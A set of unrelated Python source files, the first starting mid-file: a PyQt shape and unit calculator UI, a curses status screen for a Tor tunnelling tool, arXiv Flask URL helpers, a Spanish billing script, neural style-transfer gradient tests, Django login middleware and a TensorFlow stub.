self.label_7.setMinimumSize(QtCore.QSize(250, 0))
self.label_7.setObjectName(_fromUtf8("label_7"))
self.gridLayout_2.addWidget(self.label_7, 0, 0, 1, 1)
self.txtRectangleR = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRectangleR.setFont(font)
self.txtRectangleR.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleR.setObjectName(_fromUtf8("txtRectangleR"))
self.gridLayout_2.addWidget(self.txtRectangleR, 2, 1, 1, 1)
self.txtRectangleCfm = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtRectangleCfm.setFont(font)
self.txtRectangleCfm.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.txtRectangleCfm.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleCfm.setReadOnly(True)
self.txtRectangleCfm.setObjectName(_fromUtf8("txtRectangleCfm"))
self.gridLayout_2.addWidget(self.txtRectangleCfm, 4, 1, 1, 1)
self.txtRectangleY = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRectangleY.setFont(font)
self.txtRectangleY.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleY.setObjectName(_fromUtf8("txtRectangleY"))
self.gridLayout_2.addWidget(self.txtRectangleY, 1, 1, 1, 1)
self.txtRectangleX = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setPointSize(11)
self.txtRectangleX.setFont(font)
self.txtRectangleX.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleX.setObjectName(_fromUtf8("txtRectangleX"))
self.gridLayout_2.addWidget(self.txtRectangleX, 0, 1, 1, 1)
self.label_11 = QtGui.QLabel(self.tab)
self.label_11.setObjectName(_fromUtf8("label_11"))
self.gridLayout_2.addWidget(self.label_11, 3, 0, 1, 1)
self.txtRectangleArea = QtGui.QLineEdit(self.tab)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.txtRectangleArea.setFont(font)
self.txtRectangleArea.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.txtRectangleArea.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.txtRectangleArea.setReadOnly(True)
self.txtRectangleArea.setObjectName(_fromUtf8("txtRectangleArea"))
self.gridLayout_2.addWidget(self.txtRectangleArea, 3, 1, 1, 1)
self.verticalLayout_7.addLayout(self.gridLayout_2)
self.horizontalLayout_7 = QtGui.QHBoxLayout()
self.horizontalLayout_7.setObjectName(_fromUtf8("horizontalLayout_7"))
spacerItem18 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_7.addItem(spacerItem18)
self.btnRectangle = QtGui.QPushButton(self.tab)
self.btnRectangle.setMinimumSize(QtCore.QSize(200, 0))
self.btnRectangle.setMaximumSize(QtCore.QSize(200, 16777215))
self.btnRectangle.setObjectName(_fromUtf8("btnRectangle"))
self.horizontalLayout_7.addWidget(self.btnRectangle)
self.verticalLayout_7.addLayout(self.horizontalLayout_7)
self.horizontalLayout_8 = QtGui.QHBoxLayout()
self.horizontalLayout_8.setObjectName(_fromUtf8("horizontalLayout_8"))
spacerItem19 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_8.addItem(spacerItem19)
self.imageRectangle = QtGui.QLabel(self.tab)
self.imageRectangle.setMaximumSize(QtCore.QSize(393, 132))
self.imageRectangle.setText(_fromUtf8(""))
self.imageRectangle.setPixmap(QtGui.QPixmap(_fromUtf8("images/image_rectangle.png")))
self.imageRectangle.setScaledContents(True)
self.imageRectangle.setObjectName(_fromUtf8("imageRectangle"))
self.horizontalLayout_8.addWidget(self.imageRectangle)
spacerItem20 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_8.addItem(spacerItem20)
self.verticalLayout_7.addLayout(self.horizontalLayout_8)
spacerItem21 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout_7.addItem(spacerItem21)
self.btnConversions.addTab(self.tab, _fromUtf8(""))
self.verticalLayout.addWidget(self.btnConversions)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 458, 21))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
self.menuExit = QtGui.QMenu(self.menubar)
self.menuExit.setObjectName(_fromUtf8("menuExit"))
MainWindow.setMenuBar(self.menubar)
self.actionExit = QtGui.QAction(MainWindow)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(_fromUtf8("images/sCexit.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionExit.setIcon(icon1)
self.actionExit.setObjectName(_fromUtf8("actionExit"))
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.menuFile.addAction(self.actionExit)
self.menuExit.addAction(self.actionAbout)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuExit.menuAction())
self.retranslateUi(MainWindow)
self.btnConversions.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Shape Calculator", None))
self.label.setText(_translate("MainWindow", "Shape Calculator", None))
self.btnReset.setText(_translate("MainWindow", "Clear Form Fields", None))
self.labelTitleConversion.setText(_translate("MainWindow", "Conversion Units", None))
self.labelTitleTo.setText(_translate("MainWindow", "To", None))
self.labelTitleFrom.setText(_translate("MainWindow", "From", None))
self.lineEditOutputVolume.setText(_translate("MainWindow", "0", None))
self.labelTitleVolume.setText(_translate("MainWindow", "Volume", None))
self.label_3.setText(_translate("MainWindow", "Mass", None))
self.lineEditInputMassFlow.setText(_translate("MainWindow", "0", None))
self.lineEditOutputArea.setText(_translate("MainWindow", "0", None))
self.lineEditOutputLength.setText(_translate("MainWindow", "0", None))
self.lineEditInputArea.setText(_translate("MainWindow", "0", None))
self.lineEditOutputMassFlow.setText(_translate("MainWindow", "0", None))
self.lineEditInputDensity.setText(_translate("MainWindow", "0", None))
self.lineEditOutputDensity.setText(_translate("MainWindow", "0", None))
self.lineEditInputVolume.setText(_translate("MainWindow", "0", None))
self.lineEditInputMass.setText(_translate("MainWindow", "0", None))
self.labelTitleVelocity.setText(_translate("MainWindow", "Mass Flow", None))
self.label_4.setText(_translate("MainWindow", "Density", None))
self.labelTitleLength.setText(_translate("MainWindow", "Length", None))
self.labelTitleArea.setText(_translate("MainWindow", "Area", None))
self.lineEditOutputMass.setText(_translate("MainWindow", "0", None))
self.lineEditInputLength.setText(_translate("MainWindow", "0", None))
self.comboBoxFromLength.setItemText(0, _translate("MainWindow", "mm", None))
self.comboBoxFromLength.setItemText(1, _translate("MainWindow", "cm", None))
self.comboBoxFromLength.setItemText(2, _translate("MainWindow", "m", None))
self.comboBoxFromLength.setItemText(3, _translate("MainWindow", "km", None))
self.comboBoxFromLength.setItemText(4, _translate("MainWindow", "micron", None))
self.comboBoxFromLength.setItemText(5, _translate("MainWindow", "inch", None))
self.comboBoxFromLength.setItemText(6, _translate("MainWindow", "foot", None))
self.comboBoxFromLength.setItemText(7, _translate("MainWindow", "mile", None))
self.comboBoxToLength.setItemText(0, _translate("MainWindow", "mm", None))
self.comboBoxToLength.setItemText(1, _translate("MainWindow", "cm", None))
self.comboBoxToLength.setItemText(2, _translate("MainWindow", "m", None))
self.comboBoxToLength.setItemText(3, _translate("MainWindow", "km", None))
self.comboBoxToLength.setItemText(4, _translate("MainWindow", "micron", None))
self.comboBoxToLength.setItemText(5, _translate("MainWindow", "inch", None))
self.comboBoxToLength.setItemText(6, _translate("MainWindow", "foot", None))
self.comboBoxToLength.setItemText(7, _translate("MainWindow", "mile", None))
self.comboBoxFromArea.setItemText(0, _translate("MainWindow", "mm²", None))
self.comboBoxFromArea.setItemText(1, _translate("MainWindow", "cm²", None))
self.comboBoxFromArea.setItemText(2, _translate("MainWindow", "m²", None))
self.comboBoxFromArea.setItemText(3, _translate("MainWindow", "km²", None))
self.comboBoxFromArea.setItemText(4, _translate("MainWindow", "micron²", None))
self.comboBoxFromArea.setItemText(5, _translate("MainWindow", "inch²", None))
self.comboBoxFromArea.setItemText(6, _translate("MainWindow", "ft²", None))
self.comboBoxFromArea.setItemText(7, _translate("MainWindow", "mile²", None))
self.comboBoxToLength_2.setItemText(0, _translate("MainWindow", "mm²", None))
self.comboBoxToLength_2.setItemText(1, _translate("MainWindow", "cm²", None))
self.comboBoxToLength_2.setItemText(2, _translate("MainWindow", "m²", None))
self.comboBoxToLength_2.setItemText(3, _translate("MainWindow", "micron²", None))
self.comboBoxToLength_2.setItemText(4, _translate("MainWindow", "km²", None))
self.comboBoxToLength_2.setItemText(5, _translate("MainWindow", "inch²", None))
self.comboBoxToLength_2.setItemText(6, _translate("MainWindow", "ft²", None))
self.comboBoxToLength_2.setItemText(7, _translate("MainWindow", "mile²", None))
self.comboBoxFromVolume.setItemText(0, _translate("MainWindow", "mm³", None))
self.comboBoxFromVolume.setItemText(1, _translate("MainWindow", "cm³", None))
self.comboBoxFromVolume.setItemText(2, _translate("MainWindow", "m³", None))
self.comboBoxFromVolume.setItemText(3, _translate("MainWindow", "micron³", None))
self.comboBoxFromVolume.setItemText(4, _translate("MainWindow", "inch³", None))
self.comboBoxFromVolume.setItemText(5, _translate("MainWindow", "ft³", None))
self.comboBoxFromVolume.setItemText(6, _translate("MainWindow", "L", None))
self.comboBoxToVolume.setItemText(0, _translate("MainWindow", "mm³", None))
self.comboBoxToVolume.setItemText(1, _translate("MainWindow", "cm³", None))
self.comboBoxToVolume.setItemText(2, _translate("MainWindow", "m³", None))
self.comboBoxToVolume.setItemText(3, _translate("MainWindow", "micron³", None))
self.comboBoxToVolume.setItemText(4, _translate("MainWindow", "inch³", None))
self.comboBoxToVolume.setItemText(5, _translate("MainWindow", "ft³", None))
self.comboBoxToVolume.setItemText(6, _translate("MainWindow", "L", None))
self.comboBoxFromMass.setItemText(0, _translate("MainWindow", "kg", None))
self.comboBoxFromMass.setItemText(1, _translate("MainWindow", "g", None))
self.comboBoxFromMass.setItemText(2, _translate("MainWindow", "mg", None))
self.comboBoxFromMass.setItemText(3, _translate("MainWindow", "tonne", None))
self.comboBoxFromMass.setItemText(4, _translate("MainWindow", "lb", None))
self.comboBoxFromMass.setItemText(5, _translate("MainWindow", "oz", None))
self.comboBoxToMass.setItemText(0, _translate("MainWindow", "kg", None))
self.comboBoxToMass.setItemText(1, _translate("MainWindow", "g", None))
self.comboBoxToMass.setItemText(2, _translate("MainWindow", "mg", None))
self.comboBoxToMass.setItemText(3, _translate("MainWindow", "tonne", None))
self.comboBoxToMass.setItemText(4, _translate("MainWindow", "lb", None))
self.comboBoxToMass.setItemText(5, _translate("MainWindow", "oz", None))
self.comboBoxFromDensity.setItemText(0, _translate("MainWindow", "kg/m³", None))
self.comboBoxFromDensity.setItemText(1, _translate("MainWindow", "g/m³", None))
self.comboBoxFromDensity.setItemText(2, _translate("MainWindow", "mg/m³", None))
self.comboBoxFromDensity.setItemText(3, _translate("MainWindow", "lb/ft³", None))
self.comboBoxFromDensity.setItemText(4, _translate("MainWindow", "lb/in³", None))
self.comboBoxFromDensity.setItemText(5, _translate("MainWindow", "oz//m³", None))
self.comboBoxToDensity.setItemText(0, _translate("MainWindow", "kg/m³", None))
self.comboBoxToDensity.setItemText(1, _translate("MainWindow", "g/m³", None))
self.comboBoxToDensity.setItemText(2, _translate("MainWindow", "mg/m³", None))
self.comboBoxToDensity.setItemText(3, _translate("MainWindow", "lb/ft³", None))
self.comboBoxToDensity.setItemText(4, _translate("MainWindow", "lb/in³", None))
self.comboBoxToDensity.setItemText(5, _translate("MainWindow", "oz/m³", None))
self.comboBoxFromMassFlow.setItemText(0, _translate("MainWindow", "kg/s", None))
self.comboBoxFromMassFlow.setItemText(1, _translate("MainWindow", "lb/hr", None))
self.comboBoxFromMassFlow.setItemText(2, _translate("MainWindow", "kg/hr", None))
self.comboBoxFromMassFlow.setItemText(3, _translate("MainWindow", "lb/min", None))
self.comboBoxToMassFlow.setItemText(0, _translate("MainWindow", "kg/s", None))
self.comboBoxToMassFlow.setItemText(1, _translate("MainWindow", "lb/hr", None))
self.comboBoxToMassFlow.setItemText(2, _translate("MainWindow", "kg/hr", None))
self.comboBoxToMassFlow.setItemText(3, _translate("MainWindow", "lb/min", None))
self.btnConvert.setText(_translate("MainWindow", "Calculate", None))
self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabUnitConversion), _translate("MainWindow", "Conversions", None))
self.labelCircleTitle.setText(_translate("MainWindow", "Calculate Circle Properties", None))
self.labelInputCircle.setText(_translate("MainWindow", "Required inputs: any singe field.", None))
self.labelDiameter.setText(_translate("MainWindow", "Diameter", None))
self.txtCLS_Diamter.setText(_translate("MainWindow", "0", None))
self.labelArea.setText(_translate("MainWindow", "Area", None))
self.txtCLS_Area.setText(_translate("MainWindow", "0", None))
self.labelCircumference.setText(_translate("MainWindow", "Circumference", None))
self.txtCLS_Circumference.setText(_translate("MainWindow", "0", None))
self.btnCircles.setText(_translate("MainWindow", "Calculate", None))
self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabCircles), _translate("MainWindow", "Circles", None))
self.labelTaperTitle.setText(_translate("MainWindow", "Calculate Taper Properties", None))
self.labelTaperInput.setText(_translate("MainWindow", "Required inputs: any 3 of 4 fields.", None))
self.labelAngle.setText(_translate("MainWindow", "Taper Angle", None))
self.labelDiameter1.setText(_translate("MainWindow", "Diameter 1", None))
self.labelDiameter2.setText(_translate("MainWindow", "Diameter 2", None))
self.labelLength.setText(_translate("MainWindow", "Length", None))
self.txtTA_Angle.setText(_translate("MainWindow", "0", None))
self.txtTA_Diameter1.setText(_translate("MainWindow", "0", None))
self.txtTA_Diameter2.setText(_translate("MainWindow", "0", None))
self.txtTA_Length.setText(_translate("MainWindow", "0", None))
self.btnTaper.setText(_translate("MainWindow", "Calculate", None))
self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabTaper), _translate("MainWindow", "Taper", None))
self.labelTitleRT.setText(_translate("MainWindow", "Calculate Racetrack Properties", None))
self.labelInputRT.setText(_translate("MainWindow", "Required inputs: 2 of 4 inputs. Y is mandatory.", None))
self.labelRTx.setText(_translate("MainWindow", "Racetrack X", None))
self.txtRTRK_x.setText(_translate("MainWindow", "0", None))
self.labelRTy.setText(_translate("MainWindow", "Racetrack Y", None))
self.txtRTRK_y.setText(_translate("MainWindow", "0", None))
self.labelRTarea.setText(_translate("MainWindow", "Area", None))
self.txtRTRK_csa.setText(_translate("MainWindow", "0", None))
self.labelRTcircumference.setText(_translate("MainWindow", "Circumference", None))
self.txtRTRK_cfm.setText(_translate("MainWindow", "0", None))
self.LabelRTz.setText(_translate("MainWindow", "Racetrack Z", None))
self.txtRTRK_z.setText(_translate("MainWindow", "0", None))
self.btnRacetrack.setText(_translate("MainWindow", "Calculate", None))
self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabRaceTrack), _translate("MainWindow", "Racetrack", None))
self.labelTitleEllipse.setText(_translate("MainWindow", "Calculate Ellipse Properties", None))
self.labelInputEllipse.setText(_translate("MainWindow", "Required inputs: 2 of 3 available inputs.", None))
self.labelSMajor.setText(_translate("MainWindow", "Semimajor Dia", None))
self.labelSMinor.setText(_translate("MainWindow", "Semiminor Dia", None))
self.labelEArea.setText(_translate("MainWindow", "Area", None))
self.labelEcircumference.setText(_translate("MainWindow", "Circumference", None))
self.txtEllipses_semimajor.setText(_translate("MainWindow", "0", None))
self.txtEllipses_semiminor.setText(_translate("MainWindow", "0", None))
self.txtEllipses_csa.setText(_translate("MainWindow", "0", None))
self.txtEllipses_circumference.setText(_translate("MainWindow", "0", None))
self.btnEllipses.setText(_translate("MainWindow", "Calculate", None))
self.btnConversions.setTabText(self.btnConversions.indexOf(self.tabEllipse), _translate("MainWindow", "Ellipse", None))
self.label_5.setText(_translate("MainWindow", "Calculate Rectangle Properties", None))
self.label_6.setText(_translate("MainWindow", "Requires inputs for X and Y. R can be 0 or have a value.", None))
self.label_10.setText(_translate("MainWindow", "Circumference", None))
self.label_8.setText(_translate("MainWindow", "Y", None))
self.label_9.setText(_translate("MainWindow", "R", None))
self.label_7.setText(_translate("MainWindow", "X", None))
self.txtRectangleR.setText(_translate("MainWindow", "0", None))
self.txtRectangleCfm.setText(_translate("MainWindow", "0", None))
self.txtRectangleY.setText(_translate("MainWindow", "0", None))
self.txtRectangleX.setText(_translate("MainWindow", "0", None))
self.label_11.setText(_translate("MainWindow", "Area", None))
self.txtRectangleArea.setText(_translate("MainWindow", "0", None))
self.btnRectangle.setText(_translate("MainWindow", "Calculate", None))
self.btnConversions.setTabText(self.btnConversions.indexOf(self.tab), _translate("MainWindow", "Rectangles", None))
self.menuFile.setTitle(_translate("MainWindow", "File", None))
self.menuExit.setTitle(_translate("MainWindow", "Help", None))
self.actionExit.setText(_translate("MainWindow", "Exit", None))
self.actionAbout.setText(_translate("MainWindow", "About", None))
|
# Copyright (c) 2016, Ethan White
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
import curses
import time
import math
import signal
import qrutil
import displayutil as util
from collections import OrderedDict
def draw_title(addr, localport, remoteport, window):
center_text = util.center_pad_text("Tunneling \xb2%s\xb2 to \xb2%s\xb2" % ("%s:%s" % (addr, remoteport), "localhost:" + str(localport)), window.width)
window.draw_fancy_text(center_text, 0, 0, curses.color_pair(1))
def draw_kv(kv, window):
max_len = max([len(k) for k in kv])
new_kv = OrderedDict({})
for key in kv:
new_key = "%s%s" % (key, " " * (max_len - len(key)))
new_kv[new_key] = kv[key]
i = 0
for key in new_kv:
window.draw_fancy_text("%s \xb2%s\xb2" % (key, new_kv[key]), i + 2, 1)
i += 1
def draw_qr(data, window):
try:
# TODO: How bad is this for performance?
lines = qrutil.QRWrapper(data).compact_repr().split("\n")
# TODO: Having `i` floating here randomly doesn't look good.
i = 0
for line in lines:
y = window.height - len(lines) + i
x = window.width - len(line)
window.draw_text(line, x, y)
i += 1
except curses.error:
# TODO: Whyyyyyyyyyyyyyyy
pass
def draw(tunnel, window):
window.update_size()
window.window.clear()
draw_title(tunnel.addr, tunnel.localport, tunnel.remoteport, window)
kv = OrderedDict()
if tunnel.is_file_tunnel:
kv["Exposed file"] = tunnel.exposed_file
else:
kv["Local port"] = str(tunnel.localport)
kv["Remote host"] = "%s:%s" % (tunnel.addr, tunnel.remoteport)
kv["Remote HTTP URL"] = "http://%s:%s" % (tunnel.addr, tunnel.remoteport)
kv["Status"] = {
"startup": "Startup (unavailable)",
"running": "Available",
"down": "Error (unavailable)"
}[tunnel.status]
kv["Uptime"] = "%s second(s)" % math.floor(tunnel.uptime) if tunnel.uptime < 60 else \
"%s minute(s)" % math.floor(tunnel.uptime / 60) if tunnel.uptime < 60*60 else \
"%s hour(s)" % math.floor(tunnel.uptime / (60*60)) if tunnel.uptime < 60*60*24 else \
"%s day(s)" % math.floor(tunnel.uptime / (60*60*24))
draw_kv(kv, window)
draw_qr("%s:%s" % (tunnel.addr, tunnel.remoteport), window)
window.refresh()
def display_tunnel(tunnel):
window = util.WindowWrapper()
window.init()
def redraw(arg1=None, arg2=None):
draw(tunnel, window)
redraw()
try:
while True:
time.sleep(1)
redraw()
except KeyboardInterrupt:
window.teardown()
print("Thanks for using onion-expose!")
if __name__ == "__main__":
starttime = time.time()
class DummyTunnel:
def __init__(self):
self.addr = "facebookcorewwwi.onion"
self.localport = 8004
self.remoteport = 80
self.first_active = 0
def get_uptime(self):
return time.time() - starttime
uptime = property(get_uptime)
def __getattr__(self, key):
if key == "active":
return time.time() - starttime > 5
raise AttributeError
window = util.WindowWrapper()
tunnel = DummyTunnel()
window.init()
def redraw(arg1=None, arg2=None):
draw(tunnel, window)
redraw()
try:
while True:
# This is actually only one of two update loops.
# The other redraws information about the hidden service;
# it's much more periodic.
time.sleep(1)
redraw()
except KeyboardInterrupt:
window.teardown()
print("Thanks for using onion-expose!")
|
"""
Helpers for working with URLs in arXiv Flask applications.
This module provides :func:`external_url_handler`, which is attached to Flask
application instances by :class:`arxiv.base.Base`. This leverage's Flask's
built-in hook for :class:`flask.BuildError` exception handlers, described in
the :func:`flask.url_for` documentation.
To set a URL for an external (i.e. not provided by thie application) endpoint,
define a variable called ``URLS`` in your application configuration. ``URLS``
should be a list of three-tuples, of the form (``endpoint (str)``,
``path (str)``, ``domain (str)``). Paths should use the `Werkzeug rule format
<http://werkzeug.pocoo.org/docs/0.14/routing/#rule-format>`_. For example:
.. code-block:: python
URLS = [
("pdf", "/pdf/<arxiv:paper_id>", "arxiv.org"),
("twitter", "/arxiv", "twitter.com"),
("blog", "/arxiv", "blogs.cornell.edu")
]
You can load these urls using :func:`flask.url_for`. For example,
``url_for("pdf", paper_id="1601.00123")`` should return
``https://arxiv.org/pdf/1601.00123``.
Using environment variables
---------------------------
An alternative approach is to set the endpoint using an environment variable.
Setting ``ARXIV_FOO_URL`` will define a rule for endpoint ``foo`` using the
domain and path parsed from the variable's value. For example:
.. code-block:: python
os.environ['ARXIV_BLOG_URL'] = 'http://blogs.cornell.edu/arxiv'
Caveats
-------
URLs can be defined in :mod:`arxiv.base.config`, in environment variables,
and in the configuration of a :class:`flask.Flask` application that uses
:class:`arxiv.base.Base`. Preference is given to each of those respective
sources with increasing priority.
This will build URLs with the ``https`` scheme by default. To use ``http``,
set ``EXTERNAL_URL_SCHEME = 'http'`` in your configuration.
Danger! Memory leaks lurk here
------------------------------
Earlier versions of this module built Werkzeug routing machinery (Rules, Maps,
etc) on the fly. This led to serious memory leaks. As of v0.15.6,
:class:`.Base` uses :func:`register_external_urls` to set up external URL
handling, which registers a single :class:`.MapAdapter` on a Flask app. This
adapter is in turn used by :func:`external_url_handler` on demand.
See ARXIVNG-2085.
"""
import sys
from typing import Dict, Any, List
from urllib.parse import parse_qs
from werkzeug.urls import url_encode, url_parse, url_unparse
from werkzeug.routing import Map, Rule, BuildError, MapAdapter
from flask import current_app, g, Flask
from arxiv.base.exceptions import ConfigurationError
from arxiv.base.converter import ArXivConverter
from arxiv.base import logging
from arxiv.base import config as base_config
from .clickthrough import clickthrough_url
from .links import urlize, urlizer, url_for_doi
logger = logging.getLogger(__name__)
def build_adapter(app: Flask) -> MapAdapter:
"""Build a :class:`.MapAdapter` from configured URLs."""
# Get the base URLs (configured in this package).
configured_urls = {url[0]: url for url in base_config.URLS}
# Privilege ARXIV_URLs set on the application config.
current_urls = app.config.get('URLS', [])
if current_urls:
configured_urls.update({url[0]: url for url in current_urls})
url_map = Map([
Rule(pattern, endpoint=name, host=host, build_only=True)
for name, pattern, host in configured_urls.values()
], converters={'arxiv': ArXivConverter}, host_matching=True)
scheme = app.config.get('EXTERNAL_URL_SCHEME', 'https')
base_host = app.config.get('BASE_SERVER', 'arxiv.org')
adapter: MapAdapter = url_map.bind(base_host, url_scheme=scheme)
return adapter
def external_url_handler(err: BuildError, endpoint: str, values: Dict) -> str:
"""
Attempt to handle failed URL building with :func:`external_url_for`.
This gets attached to a Flask application via the
:func:`flask.Flask.url_build_error_handlers` hook.
"""
values.pop('_external')
try:
url: str = current_app.external_url_adapter.build(endpoint,
values=values,
force_external=True)
except BuildError:
# Re-raise the original BuildError, in context of original traceback.
exc_type, exc_value, tb = sys.exc_info()
if exc_value is err:
raise exc_type(exc_value).with_traceback(tb) # type: ignore
else:
raise err
return url
def canonical_url(id: str, version: int = 0) -> str:
"""
Generate the canonical URL for an arXiv identifier.
This can be done from just the ID because the category is only needed if it
is in the ID. id can be just the id or idv or cat/id or cat/idv.
"""
# TODO: This should be better.
# There should probably be something like INTERNAL_URL_SCHEMA
# Also, /abs should probably be specified somewhere else
# like arxiv.base.canonical
scheme = current_app.config.get('EXTERNAL_URL_SCHEME', 'https')
host = current_app.config.get('MAIN_SERVER', 'arxiv.org')
if version:
return f'{scheme}://{host}/abs/{id}v{version}'
return f'{scheme}://{host}/abs/{id}'
def register_external_urls(app: Flask) -> None:
"""Register :func:`external_url_handler` on a Flask app."""
app.external_url_adapter = build_adapter(app)
app.url_build_error_handlers.append(external_url_handler)
|
"""
Entradas
Lectura de la factura-->float-->L
Costo kilovatio-->float-->CK
Salidas
Monto total de la factura-->float-->MT
"""
L=float(input("Ingrese la lectura de su factura: "))
CK=float(input("ingrese el costo del kilovatio: "))
MT=(L*CK)
print("Monto total de su factura: "+str(MT))
|
import numpy as np
from grad_check import test_gradient
import deepart
def gen_test_target_data(net, targets):
input_shape = deepart.get_data_blob(net).data.shape
target_data_list = []
for target_i, (target_img_path, target_blob_names, is_gram, _) in enumerate(targets):
# Copy image into input blob
target_data = np.random.normal(size=input_shape)
deepart.get_data_blob(net).data[...] = target_data
net.forward()
target_datas = {}
for target_blob_name in target_blob_names:
target_data = net.blobs[target_blob_name].data.copy()
# Apply ReLU
pos_mask = target_data > 0
target_data[~pos_mask] = 0
if is_gram:
target_datas[target_blob_name] = deepart.comp_gram(target_data)
else:
target_datas[target_blob_name] = target_data
target_data_list.append(target_datas)
return target_data_list
def test_all_gradients(init_img, net, all_target_blob_names, targets, target_data_list):
# Set initial value and reshape net
deepart.set_data(net, init_img)
x0 = np.ravel(init_img).astype(np.float64)
dx = 1e-2
grad_err_thres = 1e-3
test_count = 100
input_shape = (1, 30, 40, 50)
target_data = np.random.normal(size=input_shape)
test_gradient(
deepart.content_grad, input_shape, dx, grad_err_thres, test_count,
target_data
)
target_data_gram = np.random.normal(size=(30, 30))
test_gradient(
deepart.style_grad, input_shape, dx, grad_err_thres, test_count,
target_data_gram
)
target_data_list = gen_test_target_data(net, targets)
test_gradient(
deepart.objective_func, x0.shape, dx, grad_err_thres, test_count,
net, all_target_blob_names, targets, target_data_list
)
|
from django.shortcuts import redirect
# In Django, middleware is a lightweight plugin that processes during request and response execution. Middleware is used to perform a function in the application. The functions can be a security, session, csrf protection, authentication etc. Django provides various built-in middleware and also allows us to write our own middleware. See, 'settings.py' file of Django project that contains various middleware, that is used to provides functionalities to the application. For example, Security Middleware is used to maintain the security of the application. In this app, we have created our middleware to check if the user has a session or not. If user has a session that means he/she has logged in, no one is logged in.
# auth_middleware check one get_response only. Django initializes middleware with parameter 'get_response' only once (1 request at a time). I takes the request and send back the response after checking the constraints. This method is called using get() function in cart.py, order.py and pdf.py. All the calls are in 'urls.py'
def auth_middleware(get_response):
# One-time configuration and initialization.
def middleware(request):
# print(request.session.get('customer'))
returnUrl = request.META['PATH_INFO']
# Django uses request and response objects to pass state through the system. When a page is requested, Django creates an HttpRequest object that contains metadata about the request. Therefore request.META contains the metadata of the object and 'PATH_INFO' contains 'the path information portion of the path'.
# for example if we have use a webserver at path in urls.py '/omkar_info' and we want to excess the image file in '/uploads/products' folder and say url='../uploads/products' then when we print url.path() it will give the entire path of the image e.g.'/omkar_info/uploads/products/<image.png>' which is not good if we want to test our app on different servers. But if we use url.path_info() then it will give only give the info of the path e.g '/uploads/products/<image.png>'.
# This is the reason we used 'PATH_INFO'.
# print(request.META['PATH_INFO'])
# Sessions are the mechanism used by Django (and most of the Internet) for keeping track of the "state" between the site and a particular browser. Sessions allow you to store arbitrary data per browser, and have this data available to the site whenever the browser connects.
# request.session.get returns true if the user is logged in, else it will be redirect to the login page.
print(request.session.get('customer'))
if not request.session.get('customer'):
return redirect(f'login?return_url={returnUrl}')
response = get_response(request)
return response
return middleware
|
import model3 as M
import tensorflow as tf
import numpy as np
import network
import datareader
BSIZE = 128*4
EPOCH = 30
# data_reader = datareader.DataReader('imglist_iccv.txt', BSIZE)
tf.keras.backend.set_learning_phase(True)
